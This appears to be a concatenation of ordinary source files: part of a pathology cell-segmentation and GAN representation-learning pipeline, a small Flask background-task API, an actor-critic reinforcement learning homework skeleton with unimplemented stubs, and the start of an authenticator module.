cell_segment(i, negative_npy_root + str(intensity)
+ '/', ref_path, intensity)
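# Example call (hypothetical paths and intensity; multi_core=False runs the loops serially):
#   cell_segmentation('data/positive/', 'data/negative/', 'npy/positive/',
#                     'npy/negative/', 'data/ref.png', intensity=20, multi_core=False)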
def split_dataset(path, fold=4, random_seed=42):
'''
Split dataset in k folds
Parameters
----------
path : str
path to npy file with images.
fold : int, optional
number of folds to split the dataset. The default is 4.
random_seed : int, optional
random seed. The default is 42.
Returns
-------
train_list : list
list with paths of split training data files.
test_list : list
list with paths of split testing data files.
'''
np.random.seed(random_seed)
kf = KFold(n_splits=fold, shuffle=True)
kf.get_n_splits(path)
train_list, test_list = [], []
for train_index, test_index in kf.split(path):
train_list.append([path[n] for n in train_index])
test_list.append([path[n] for n in test_index])
return train_list, test_list
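# Example (hypothetical file names): with fold=4 on four paths, each of the four
# train folds holds three paths and each test fold holds the remaining one:
#   train_folds, test_folds = split_dataset(['a.npy', 'b.npy', 'c.npy', 'd.npy'], fold=4)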
def eval_plots(values_D_G, l_q, purities, experiment_root, sample=30):
'''
Create and save evaluation plots - purity and loss over iterations
Parameters
----------
values_D_G : array
values of function V(D, G) over iterations. Used to evaluate how well the generator distribution matches the real data distribution.
l_q : array
values of loss function of auxiliary network over iterations.
purities : array
values of clustering purity over iterations.
experiment_root : str
path of experiment root.
sample : int, optional
sample rate to plot. The default is 30.
Returns
-------
None.
'''
if len(purities) > 0:
# sample purities to plot
sample_purities = []
indexes = []
for i in range(0, len(purities)):
if i % sample == 0:
sample_purities.append(purities[i])
indexes.append(i)
figure(figsize=(10, 6), dpi=80)
plt.plot(indexes, sample_purities, label="purities")
plt.xlabel("Generator iterations")
plt.ylabel("Purity")
plt.legend()
plt.savefig(experiment_root + "purities.png")
# sample l_q and vdg to plot
sample_lq = []
sample_vdg = []
indexes = []
for i in range(0, len(l_q)):
if i % sample == 0:
sample_lq.append(l_q[i])
sample_vdg.append(values_D_G[i])
indexes.append(i)
figure(figsize=(10, 6), dpi=80)
plt.plot(indexes, sample_vdg, label="V(D,G)")
plt.plot(indexes, sample_lq, label="Lq")
plt.xlabel("Generator iterations")
plt.ylabel("Loss")
plt.legend()
plt.savefig(experiment_root + "loss.png")
def cell_representation(X_train_path, X_test_path, y_train_path, y_test_path,
experiment_root, n_epoch=50, batchsize=16, rand=32,
dis_category=5, ld = 1e-4, lg = 1e-4, lq = 1e-4,
save_model_steps=100, image_classification = False):
'''
Creates and trains model of cell-level visual representation learning
Parameters
----------
X_train_path : str
path to .npy file with training data
X_test_path : str
path to .npy file with testing data
y_train_path : str
path to .npy file with training labels
y_test_path : str
path to .npy file with testing labels
experiment_root : str
path to experiment root
n_epoch : int
number of epochs for training. The default is 50.
batchsize : int
batch size. The default is 16.
rand : int
number of gaussian noise variables. The default is 32.
dis_category : int
number of categories / clusters. The default is 5.
ld : float
learning rate for discriminator network D. The default is 1e-4.
lg : float
learning rate for generator network G. The default is 1e-4.
lq : float
learning rate for auxiliary network Q. The default is 1e-4.
save_model_steps : int
number of steps to save the model. The default is 100.
image_classification : bool, optional
if the training is for image classification or not. The default is False.
Returns
-------
values_D_G : list
values of function V(D, G) over iterations. Used to evaluate how well the generator distribution matches the real data distribution
l_q : list
values of loss function of auxiliary network over iterations.
purities: list
values of clustering purity over iterations
'''
# load training and testing datasets
X_train = np.load(X_train_path)
X_test = np.load(X_test_path)
y_train = np.load(y_train_path)
y_test = np.load(y_test_path)
# create cell training and testing sets
cell_train_set = np.concatenate([X_train, X_test])
cell_test_set = cell_train_set
cell_test_label = np.concatenate([y_train, y_test])
# initialize empty npys
positive_train_npy = []
positive_test_npy = []
negative_train_npy = []
negative_test_npy = []
# create / initialize the model
netD, netG, netD_D, netD_Q = create_model(rand=rand, dis_category=dis_category)
# train cell representation
values_D_G, l_q, purities = train_representation(
cell_train_set, cell_test_set, cell_test_label,
positive_train_npy, positive_test_npy, negative_train_npy,
negative_test_npy, netD, netG,
netD_D, netD_Q, experiment_root, n_epoch=n_epoch,
batchsize=batchsize, rand=rand,
dis_category=dis_category, ld=ld, lg=lg, lq=lq,
save_model_steps=save_model_steps,
image_classification = image_classification)
# convert l_q to numpy
l_q_np = []
for i in range(0, len(l_q)):
l_q_np.append(l_q[i].cpu().detach().numpy())
# save results
np.save(experiment_root + 'purities', purities)
np.save(experiment_root + 'values_D_G', values_D_G)
np.save(experiment_root + 'l_q', l_q_np)
# save evaluation plots
eval_plots(values_D_G, l_q_np, purities, experiment_root)
# view resulting representations
model_path = experiment_root + "/model/"
figure_8(X_train_path, X_test_path, model_path, output_dir=experiment_root)
return values_D_G, l_q_np, purities
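# Example call (hypothetical .npy paths, default hyperparameters):
#   values_D_G, l_q, purities = cell_representation(
#       'data/X_train.npy', 'data/X_test.npy', 'data/y_train.npy', 'data/y_test.npy',
#       'experiments/run1/')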
def cell_representation_unlabeled(images_path, ref_path, npy_path, experiment_root, n_epoch=50,
batchsize=16, rand=32, dis_category=5, ld = 1e-4, lg = 1e-4,
lq = 1e-4, save_model_steps=100, image_classification = False):
'''
Creates and trains model of cell-level visual representation learning with unlabeled data
Parameters
----------
images_path : str
path with images for prepping.
ref_path : str
path with reference image for stain normalization.
npy_path : str
path to save npy file with single-cell images.
experiment_root : str
path to experiment root
n_epoch : int
number of epochs for training. The default is 50.
batchsize : int
batch size. The default is 16.
rand : int
number of gaussian noise variables. The default is 32.
dis_category : int
number of categories / clusters. The default is 5.
ld : float
learning rate for discriminator network D. The default is 1e-4.
lg : float
learning rate for generator network G. The default is 1e-4.
lq : float
learning rate for auxiliary network Q. The default is 1e-4.
save_model_steps : int
number of steps to save the model. The default is 100.
image_classification : bool, optional
if the training is for image classification or not. The default is False.
Returns
-------
values_D_G : list
values of function V(D, G) over iterations. Used to evaluate how well the generator distribution matches the real data distribution
l_q : list
values of loss function of auxiliary network over iterations.
'''
# prep data, generate npy file
masks_to_npy(images_path, ref_path, npy_path)
# load training data
X_train = np.load(npy_path + "Train.npy")
# create datasets
cell_train_set = X_train
cell_test_set = np.array([])
cell_test_label = np.array([])
# initialize empty npys
positive_train_npy = []
positive_test_npy = []
negative_train_npy = []
negative_test_npy = []
# create / initialize the model
netD, netG, netD_D, netD_Q = create_model(rand=rand, dis_category=dis_category)
# train cell representation
values_D_G, l_q = train_representation(
cell_train_set, cell_test_set, cell_test_label,
positive_train_npy, positive_test_npy, negative_train_npy,
negative_test_npy, netD, netG,
netD_D, netD_Q, experiment_root, n_epoch=n_epoch,
batchsize=batchsize, rand=rand,
dis_category=dis_category, ld=ld, lg=lg, lq=lq,
save_model_steps=save_model_steps,
image_classification = image_classification)
# convert l_q to numpy
l_q_np = []
for i in range(0, len(l_q)):
l_q_np.append(l_q[i].cpu().detach().numpy())
# save results
np.save(experiment_root + 'values_D_G', values_D_G)
np.save(experiment_root + 'l_q', l_q_np)
# save evaluation plots
eval_plots(values_D_G, l_q_np, [], experiment_root)
X_train_path = npy_path + "Train.npy"
X_test_path = None
model_path = experiment_root + "/model/"
figure_8(X_train_path, X_test_path, model_path, rand = rand, dis_category = dis_category, output_dir=experiment_root)
return values_D_G, l_q_np
def image_classification(positive_images_root, negative_images_root,
positive_npy_root,negative_npy_root, ref_path, intensity,
X_train_path, X_test_path, y_train_path, y_test_path,
experiment_root, multi_core = True, fold = 4, random_seed=42,
choosing_fold = 1, n_epoch=10000, batchsize=32, rand=64,
dis_category=5, ld = 1e-4, lg = 1e-4, lq = 1e-4,
save_model_steps = 100, image_classification = True):
'''
Applies cell segmentation to images, creates and trains a model of cell-level visual representation learning, and performs image classification.
Parameters
----------
positive_images_root : str
path with positive images.
negative_images_root : str
path with negative images.
positive_npy_root : str
path with positive npy file.
negative_npy_root : str
path with negative npy file.
ref_path : str
path with reference image for stain normalization.
intensity : int
intensity for segmentation thresholding.
X_train_path : str
path with training data.
X_test_path : str
path with testing data.
y_train_path : str
path with training labels.
y_test_path : str
path with testing labels.
experiment_root : str
path of experiment root.
multi_core : bool, optional
if the process is multi core. The default is True.
fold : int, optional
number of folds to split dataset. The default is 4.
random_seed : int, optional
random seed. The default is 42.
choosing_fold : int, optional
The default is 1.
n_epoch : int, optional
number of epochs for training. The default is 10000.
batchsize : int, optional
size of the batch. The default is 32.
rand : int, optional
number of gaussian noise variables. The default is 64.
dis_category : int, optional
number of categories / clusters. The default is 5.
ld : float, optional
learning rate for discriminator network D. The default is 1e-4.
lg : float, optional
learning rate for generator network G. The default is 1e-4.
lq : float, optional
learning rate for auxiliary network Q. The default is 1e-4.
save_model_steps : int, optional
number of steps to save the model. The default is 100.
image_classification : bool, optional
if the training is for image classification or not. The default is True.
Returns
-------
values_D_G : list
values of function V(D, G) over iterations.
l_q : list
values of loss function of auxiliary network over iterations.
purities : list
values of clustering purity over iterations.
'''
positive_npy_path = [positive_npy_root + str(intensity) + '/' + n[:-3] +
'npy' for n in os.listdir(positive_images_root)]
negative_npy_path = [negative_npy_root + str(intensity) + '/' + n[:-3] +
'npy' for n in os.listdir(negative_images_root)]
positive_train_list, positive_test_list = split_dataset(positive_npy_path,
fold, random_seed)
negative_train_list, negative_test_list = split_dataset(negative_npy_path,
fold, random_seed)
positive_train_npy = [np.load(n, allow_pickle=True) for n in
positive_train_list[choosing_fold]]
positive_test_npy = [np.load(n, allow_pickle=True) for n in
positive_test_list[choosing_fold]]
negative_train_npy = [np.load(n, allow_pickle=True) for n in
negative_train_list[choosing_fold]]
negative_test_npy = [np.load(n, allow_pickle=True) for n in
negative_test_list[choosing_fold]]
cell_train_set = np.concatenate([np.concatenate(positive_train_npy), np.concatenate(negative_train_npy)])
# load training and testing datasets
X_train = np.load(X_train_path)
X_test = np.load(X_test_path)
y_train = np.load(y_train_path)
y_test = np.load(y_test_path)
# create cell training and testing sets
cell_test_set = np.concatenate([X_train, X_test])
cell_test_label = np.concatenate([y_train, y_test])
cell_train_set = rotation(cell_test_set)
# create / initialize the model
netD, netG, netD_D, netD_Q = create_model(rand=rand, dis_category=dis_category)
# train cell representation
values_D_G, l_q, purities = train_representation(
cell_train_set, cell_test_set, cell_test_label, positive_train_npy,
positive_test_npy, negative_train_npy, negative_test_npy, netD, netG, netD_D,
netD_Q, experiment_root, n_epoch=n_epoch, batchsize=batchsize, rand=rand,
dis_category=dis_category,
ld = ld, lg = lg, lq = lq, save_model_steps=save_model_steps,
image_classification=image_classification,)
# convert l_q to numpy
l_q_np = []
for i in range(0, len(l_q)):
l_q_np.append(l_q[i].cpu().detach().numpy())
# save results
np.save(experiment_root + 'purities', purities)
np.save(experiment_root + 'values_D_G', values_D_G)
np.save(experiment_root + 'l_q', l_q_np)
# save evaluation plots
eval_plots(values_D_G, l_q_np, purities, experiment_root)
# view resulting representations
model_path = experiment_root + "/model/"
figure_8(X_train_path, X_test_path, model_path, output_dir=experiment_root)
return values_D_G, l_q_np, purities
|
rest_api_return_and_process.py
|
import multiprocessing
from flask import Flask, jsonify, request, make_response, abort
app = Flask(__name__)
def long_running_task(thread_name):
for i in range(100000000):
if i % 100000 == 0:
print('Processing request ' + str(thread_name))
@app.route('/eshan/api/v1.0/superheroes/add', methods=['POST'])
def add_superhero():
if not request.json or 'id' not in request.json:
abort(400)
id = request.json['id']
thread = multiprocessing.Process(target=long_running_task, args=(id,))
thread.start()
print('returning before the process ends. Process will continue in background')
return jsonify({'status': 'running'})
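# Example request against a local debug server (hypothetical host/port; Flask's
# development server defaults to port 5000):
#   curl -X POST -H "Content-Type: application/json" \
#        -d '{"id": 1}' http://localhost:5000/eshan/api/v1.0/superheroes/add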
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
if __name__ == '__main__':
app.run(debug=True)
|
train_ac_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
Adapted for pytorch version by Ning Dai
"""
import numpy as np
import torch
import gym
import logz
import os
import time
import inspect
from torch.multiprocessing import Process
from torch import nn, optim
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_size, output_size, n_layers, hidden_size, activation=nn.Tanh):
"""
Builds a feedforward neural network
arguments:
input_size: size of the input layer
output_size: size of the output layer
n_layers: number of hidden layers
hidden_size: dimension of the hidden layers
activation: activation of the hidden layers
output_activation: activation of the output layer
returns:
an instance of nn.Sequential which contains the feedforward neural network
Hint: use nn.Linear
"""
layers = []
# YOUR HW2 CODE HERE
raise NotImplementedError
return nn.Sequential(*layers).apply(weights_init)
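# A minimal sketch of one possible implementation of the network described in the
# docstring above (illustrative only, not the course's reference solution):
#   layers = []
#   in_dim = input_size
#   for _ in range(n_layers):
#       layers.append(nn.Linear(in_dim, hidden_size))
#       layers.append(activation())
#       in_dim = hidden_size
#   layers.append(nn.Linear(in_dim, output_size))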
def weights_init(m):
if hasattr(m, 'weight'):
nn.init.xavier_uniform_(m.weight)
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
hyperparams = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_hyperparams(hyperparams)
class PolicyNet(nn.Module):
def __init__(self, neural_network_args):
super(PolicyNet, self).__init__()
self.ob_dim = neural_network_args['ob_dim']
self.ac_dim = neural_network_args['ac_dim']
self.discrete = neural_network_args['discrete']
self.hidden_size = neural_network_args['size']
self.n_layers = neural_network_args['actor_n_layers']
self.define_model_components()
def define_model_components(self):
"""
Define the parameters of policy network here.
You can use any instance of nn.Module or nn.Parameter.
Hint: use the 'build_mlp' function above
In the discrete case, model should output logits of a categorical distribution
over the actions
In the continuous case, model should output a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
"""
# YOUR HW2 CODE HERE
if self.discrete:
raise NotImplementedError
else:
raise NotImplementedError
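# Illustrative sketch of one possible layout (placeholder attribute names, not the
# reference solution):
#   discrete:   self.mlp = build_mlp(self.ob_dim, self.ac_dim, self.n_layers, self.hidden_size)
#   continuous: self.mean_net = build_mlp(self.ob_dim, self.ac_dim, self.n_layers, self.hidden_size)
#               self.ts_logstd = nn.Parameter(torch.zeros(self.ac_dim))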
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
"""
Notes on notation:
Pytorch tensor variables have the prefix ts_, to distinguish them from the numpy array
variables that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch size, observation dim)
_na - this tensor should have shape (batch size, action dim)
_n - this tensor should have shape (batch size)
Note: batch size is defined at runtime
"""
def forward(self, ts_ob_no):
"""
Define forward pass for policy network.
arguments:
ts_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
ts_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
ts_mean: (batch_size, self.ac_dim)
ts_logstd: (self.ac_dim,)
Hint: use the components you defined in self.define_model_components
"""
raise NotImplementedError
if self.discrete:
# YOUR HW2 CODE HERE
ts_logits_na = None
return ts_logits_na
else:
# YOUR HW2 CODE HERE
ts_mean = None
ts_logstd = None
return (ts_mean, ts_logstd)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, neural_network_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = neural_network_args['ob_dim']
self.ac_dim = neural_network_args['ac_dim']
self.discrete = neural_network_args['discrete']
self.hidden_size = neural_network_args['size']
self.critic_n_layers = neural_network_args['critic_n_layers']
self.actor_learning_rate = neural_network_args['actor_learning_rate']
self.critic_learning_rate = neural_network_args['critic_learning_rate']
self.num_target_updates = neural_network_args['num_target_updates']
self.num_grad_steps_per_target_update = neural_network_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
self.policy_net = PolicyNet(neural_network_args)
self.value_net = build_mlp(self.ob_dim, 1, self.critic_n_layers, self.hidden_size)
self.actor_optimizer = optim.Adam(self.policy_net.parameters(), lr=self.actor_learning_rate)
self.critic_optimizer = optim.Adam(self.value_net.parameters(), lr=self.critic_learning_rate)
def sample_action(self, ob_no):
"""
Build the method used for sampling action from the policy distribution
arguments:
ob_no: (batch_size, self.ob_dim)
returns:
sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use torch.normal!)
"""
ts_ob_no = torch.from_numpy(ob_no).float()
raise NotImplementedError
if self.discrete:
ts_logits_na = self.policy_net(ts_ob_no)
# YOUR HW2 CODE HERE
ts_probs = None
ts_sampled_ac = None
else:
ts_mean, ts_logstd = self.policy_net(ts_ob_no)
# YOUR HW2 CODE HERE
ts_sampled_ac = None
sampled_ac = ts_sampled_ac.numpy()
return sampled_ac
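# Illustrative sketch of the sampling described in the docstring (placeholder names,
# not the graded solution):
#   discrete:   ts_probs = nn.functional.softmax(ts_logits_na, dim=-1)
#               ts_sampled_ac = torch.multinomial(ts_probs, 1).squeeze(-1)
#   continuous: z = torch.normal(torch.zeros_like(ts_mean), torch.ones_like(ts_mean))
#               ts_sampled_ac = ts_mean + torch.exp(ts_logstd) * z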
def get_log_prob(self, policy_parameters, ts_ac_na):
"""
Build the method used for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
ts_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
ts_mean: (batch_size, self.ac_dim)
ts_logstd: (self.ac_dim,)
ts_ac_na: (batch_size, self.ac_dim)
returns:
ts_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
raise NotImplementedError
if self.discrete:
ts_logits_na = policy_parameters
# YOUR HW2 CODE HERE
ts_logprob_n = None
else:
ts_mean, ts_logstd = policy_parameters
# YOUR HW2 CODE HERE
ts_logprob_n = None
return ts_logprob_n
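# Illustrative sketch using torch.distributions (not the graded solution):
#   discrete:   ts_logprob_n = torch.distributions.Categorical(
#                   logits=ts_logits_na).log_prob(ts_ac_na.long())
#   continuous: ts_logprob_n = torch.distributions.Normal(
#                   ts_mean, torch.exp(ts_logstd)).log_prob(ts_ac_na).sum(-1)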
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
raise NotImplementedError
ac = None # YOUR HW2 CODE HERE
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
# add the observation after taking a step to next_obs
# YOUR CODE HERE
raise NotImplementedError
rewards.append(rew)
steps += 1
# If the episode ended, the corresponding terminal value is 1
# otherwise, it is 0
# YOUR CODE HERE
if done or steps > self.max_path_length:
raise NotImplementedError
break
else:
raise NotImplementedError
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep or 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
# First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
# To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
# This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
# and V(s) when subtracting the baseline
# Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
# otherwise the values will grow without bound.
# YOUR CODE HERE
raise NotImplementedError
adv_n = None
if self.normalize_advantages:
raise NotImplementedError
adv_n = None # YOUR HW2 CODE HERE
return adv_n
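# Illustrative sketch of the estimate described above (not the graded solution);
# assumes the critic outputs shape (N, 1):
#   v_s  = self.value_net(torch.from_numpy(ob_no).float()).squeeze(-1).detach().numpy()
#   v_sp = self.value_net(torch.from_numpy(next_ob_no).float()).squeeze(-1).detach().numpy()
#   q_n  = re_n + self.gamma * v_sp * (1 - terminal_n)
#   adv_n = q_n - v_s
#   if self.normalize_advantages:
#       adv_n = (adv_n - adv_n.mean()) / (adv_n.std() + 1e-8)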
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep or 0 if the episode did not end
returns:
nothing
"""
# Use bootstrapped target values to update the critic
# Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
# In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
# Every self.num_grad_steps_per_target_update steps, recompute the target values
# by evaluating V(s') on the updated critic
# Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
# otherwise the values will grow without bound.
# YOUR CODE HERE
raise NotImplementedError
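# Illustrative sketch of the bootstrapped update described above (not the graded
# solution); ts_* denote the numpy inputs converted to float tensors:
#   for _ in range(self.num_target_updates):
#       with torch.no_grad():
#           target = ts_re_n + self.gamma * self.value_net(ts_next_ob_no).squeeze(-1) \
#                    * (1 - ts_terminal_n)
#       for _ in range(self.num_grad_steps_per_target_update):
#           loss = nn.functional.mse_loss(self.value_net(ts_ob_no).squeeze(-1), target)
#           self.critic_optimizer.zero_grad()
#           loss.backward()
#           self.critic_optimizer.step()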
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
# convert numpy array to pytorch tensor
ts_ob_no, ts_ac_na, ts_adv_n = map(lambda x: torch.from_numpy(x), [ob_no, ac_na, adv_n])
# The policy takes in an observation and produces a distribution over the action space
policy_parameters = self.policy_net(ts_ob_no)
# We can compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
ts_logprob_n = self.get_log_prob(policy_parameters, ts_ac_na)
# clean the gradient for model parameters
self.actor_optimizer.zero_grad()
actor_loss = - (ts_logprob_n * ts_adv_n).mean()
actor_loss.backward()
self.actor_optimizer.step()
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
actor_learning_rate,
critic_learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
actor_n_layers,
critic_n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
torch.manual_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
neural_network_args = {
'actor_n_layers': actor_n_layers,
'critic_n_layers': critic_n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'actor_learning_rate': actor_learning_rate,
'critic_learning_rate': critic_learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(neural_network_args, sample_trajectory_args, estimate_advantage_args)
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
with torch.no_grad(): # use torch.no_grad to disable the gradient calculation
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
# Call the agent's update methods to:
# (1) update the critic, by calling agent.update_critic
# (2) use the updated critic to compute the advantage, by calling agent.estimate_advantage
# (3) use the estimated advantage values to update the actor, by calling agent.update_actor
# YOUR CODE HERE
raise NotImplementedError
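# One possible ordering of the three calls described above (sketch only):
#   agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
#   adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
#   agent.update_actor(ob_no, ac_na, adv_n)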
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.save_pytorch_model(agent)
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--actor_learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--critic_learning_rate', '-clr', type=float)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--actor_n_layers', '-l', type=int, default=2)
parser.add_argument('--critic_n_layers', '-cl', type=int)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
if not args.critic_learning_rate:
args.critic_learning_rate = args.actor_learning_rate
if not args.critic_n_layers:
args.critic_n_layers = args.actor_n_layers
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
actor_learning_rate=args.actor_learning_rate,
critic_learning_rate=args.critic_learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
actor_n_layers=args.actor_n_layers,
critic_n_layers=args.critic_n_layers,
size=args.size
)
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
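# Example invocation (the script file name is an assumption; the flags match the argparse setup above):
#   python train_ac.py CartPole-v0 -n 100 -b 1000 -e 3 --exp_name 1_1 -ntu 1 -ngsptu 1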
|
authenticator.py
|
"""Authenticator module"""
from __future__ import absolute_import
from eap_module import EapModule
